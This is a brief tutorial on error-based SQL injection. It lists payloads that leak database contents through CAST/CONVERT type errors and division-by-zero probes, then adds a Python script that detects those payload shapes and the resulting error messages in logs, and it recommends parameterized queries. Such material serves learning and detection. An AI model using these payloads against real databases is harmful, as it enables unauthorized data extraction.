Error-based SQLi


Error messages are sometimes enabled. When they are, they make it easier to exploit other types of SQL injection, such as Union-based SQLi.

If no easier SQLi attack is possible, we may use error messages to dump the database.

-- Error: Incorrect INTEGER value: 'admin'
Select 1=CAST((SELECT username FROM membres LIMIT 1) AS int)
-- Error: Division by zero
Select [...] where 1=(case when (1=1) then 1/0 else 0 end)

In MSSQL, if CAST doesn't work, try CONVERT:

-- Conversion failed ... value 'Microsoft SQL [...]' ...
Select convert(int,@@version)
Select convert(int,(select @@version))
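
From the detection side, the expressions and error messages above leave recognisable traces in request and response logs. The following is an added example, not part of the original page: it flags requests carrying those expression shapes when the response echoes a database error, and extracts the value the error leaked. The "id" parameter, the sample pairs and the full wording of the MSSQL message are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Payload shapes shown on the page (CAST/CONVERT around a subquery or @@variable, CASE ... 1/0).
PAYLOAD_PATTERNS = {
    "cast_subquery": re.compile(r"cast\s*\(\s*\(\s*select\b", re.I),
    "convert_int": re.compile(r"convert\s*\(\s*int\s*,\s*(?:\(\s*select\b|@@)", re.I),
    "case_div_zero": re.compile(r"case\s+when\b.*?\bthen\s+1\s*/\s*0\b", re.I | re.S),
}
# Error text shown on the page; a quoted value in the message is data that reached the client.
ERROR_PATTERNS = {
    "type_conversion": re.compile(
        r"(?:incorrect integer value:|conversion failed\b[^']*)\s*'([^']*)'", re.I),
    "division_by_zero": re.compile(r"division by zero", re.I),
}

def inspect_request(raw_query):
    """Names of payload shapes present in a URL-encoded query string."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in PAYLOAD_PATTERNS.items() if rx.search(decoded)]

def inspect_response(body):
    """(error kind, leaked value or None) for each DB error echoed in a response."""
    findings = []
    for name, rx in ERROR_PATTERNS.items():
        for m in rx.finditer(body):
            findings.append((name, m.group(1) if rx.groups else None))
    return findings

# Constructed request/response pairs (hypothetical "id" parameter), not real traffic.
SAMPLES = [
    ("id=CAST((SELECT+username+FROM+membres+LIMIT+1)+AS+int)",
     "Error: Incorrect INTEGER value: 'admin'"),
    ("id=convert(int,@@version)",
     "Conversion failed when converting the nvarchar value 'Microsoft SQL Server' to data type int."),
    ("id=42", "<h1>Product 42</h1>"),
]

def triage(samples):
    """Alert where an injection-shaped request was answered with a verbose DB error."""
    alerts = []
    for query, body in samples:
        shapes, errors = inspect_request(query), inspect_response(body)
        if shapes and errors:
            alerts.append({"shapes": shapes, "leaked": [v for _, v in errors if v]})
    return alerts

if __name__ == "__main__":
    print(triage(SAMPLES))
```

An alert from triage means both conditions held: user input reached the query as SQL, and the database error text was returned to the client. Parameterized queries remove the first condition and generic error pages remove the second.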